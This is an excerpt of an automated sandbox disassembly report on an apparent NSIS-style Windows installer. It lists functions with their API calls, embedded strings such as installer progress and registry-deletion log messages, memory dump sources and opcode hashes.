                                                                                  • String ID: f
                                                                                  • API String ID: 41195575-1993550816
                                                                                  • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                  • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                  • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                  • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                  Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                  • MulDiv.KERNEL32(0000F000,00000064,?), ref: 00403295
                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                  Strings
                                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                  • String ID: verifying installer: %d%%
                                                                                  • API String ID: 1451636040-82062127
                                                                                  • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                  • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                  • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                  • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                  Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                  • wsprintfW.USER32 ref: 00404457
                                                                                  • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                  • String ID: %u.%u%s%s$@rD
                                                                                  • API String ID: 3540041739-1813061909
                                                                                  • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                  • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                  • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                  • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                  Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                  • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                  • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$Next$Prev
                                                                                  • String ID: *?|<>/":
                                                                                  • API String ID: 589700163-165019052
                                                                                  • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                  • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                  • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                  • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                  Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1912718029-0
                                                                                  • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                  • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                  • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                  • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                  Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 1849352358-0
                                                                                  • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                  • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                  • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                  • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                  Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Timeout
                                                                                  • String ID: !
                                                                                  • API String ID: 1777923405-2657877971
                                                                                  • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                  • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                  • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                  • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                  Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                  • API String ID: 1697273262-1764544995
                                                                                  • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                  • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                  • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                  • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                  Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00404902
                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                  • String ID: $@rD
                                                                                  • API String ID: 3748168415-881980237
                                                                                  • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                  • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                  • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                  • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                  Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                    • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                    • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                  • API String ID: 2577523808-3778932970
                                                                                  • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                  • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                  • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                  • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                  Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcatwsprintf
                                                                                  • String ID: %02x%c$...
                                                                                  • API String ID: 3065427908-1057055748
                                                                                  • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                  • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                  • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                  • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                  Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                  • API String ID: 2266616436-4211696005
                                                                                  • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                  • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                  • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                  • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                  Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1599320355-0
                                                                                  • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                  • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                  • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                  • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                  Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                  • String ID: Version
                                                                                  • API String ID: 512980652-315105994
                                                                                  • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                  • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                  • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                  • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                  Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
